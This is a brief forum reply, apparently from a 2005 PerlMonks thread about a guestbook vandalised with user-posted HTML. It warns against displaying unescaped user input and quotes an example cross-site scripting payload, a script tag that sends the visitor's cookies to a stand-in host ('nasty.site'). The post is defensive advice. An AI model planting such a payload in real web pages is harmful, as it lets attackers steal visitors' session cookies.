in reply to Re: Emergency! Our guestbook is getting trashed by HTML!
in thread Emergency! Our guestbook is getting trashed by HTML!
take a look at http://www.cgisecurity.com/articles/xss-faq.shtml#theft for information on why this can be "very bad"<script> document.location='http://nasty.site/cgi-bin/cookie.cgi?'%20+document. +cookie </script>
in short: never display uncooked user input in a web page unless you have a very good reason to.
|
|---|
| Replies are listed 'Best First'. | |
|---|---|
|
Re^3: Emergency! Our guestbook is getting trashed by HTML!
by manwhore (Initiate) on Jan 07, 2005 at 22:49 UTC |